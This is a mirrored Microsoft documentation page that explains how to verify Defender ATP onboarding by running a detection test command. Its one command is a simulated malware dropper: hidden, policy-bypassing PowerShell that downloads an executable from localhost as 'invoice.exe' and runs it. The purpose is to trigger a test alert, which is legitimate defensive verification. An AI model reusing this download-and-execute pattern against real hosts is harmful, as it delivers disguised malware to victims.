deepblue/windows-itpro-docs
1
0
Fork 0
mirror of https://github.com/MicrosoftDocs/windows-itpro-docs.git synced 2025-05-12 05:17:22 +00:00
Code Issues Actions 2 Packages Projects Releases Wiki Activity
windows-itpro-docs/windows/security/threat-protection/microsoft-defender-atp/run-detection-test.md
Nick Schonning 4cc0773fe8 fix: MD019/no-multiple-space-atx 
Multiple spaces after hash on atx style heading
2019-08-10 17:07:41 -04:00

2.1 KiB
Raw Blame History

title, description, keywords, search.product, search.appverid, ms.prod, ms.mktglfcycl, ms.sitesec, ms.pagetype, ms.author, author, ms.localizationpriority, manager, audience, ms.collection, ms.topic
title description keywords search.product search.appverid ms.prod ms.mktglfcycl ms.sitesec ms.pagetype ms.author author ms.localizationpriority manager audience ms.collection ms.topic
Run a detection test on a newly onboarded Microsoft Defender ATP machine Run the detection script on a newly onboarded machine to verify that it is properly onboarded to the Microsoft Defender ATP service. detection test, detection, powershell, script, verify, onboarding, windows defender advanced threat protection onboarding, clients, servers, test eADQiWindows 10XVcnh met150 w10 deploy library security macapara mjcaparas medium dansimp ITPro M365-security-compliance article

Run a detection test on a newly onboarded Microsoft Defender ATP machine

Applies to:

Run the following PowerShell script on a newly onboarded machine to verify that it is properly reporting to the Microsoft Defender ATP service.

  1. Create a folder: 'C:\test-WDATP-test'.

  2. Open an elevated command-line prompt on the machine and run the script:

    a. Go to Start and type cmd.

    b. Right-click Command Prompt and select Run as administrator.

    Window Start menu pointing to Run as administrator

  3. At the prompt, copy and run the following command:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'

The Command Prompt window will close automatically. If successful, the detection test will be marked as completed and a new alert will appear in the portal for the onboarded machine in approximately 10 minutes.

Related topics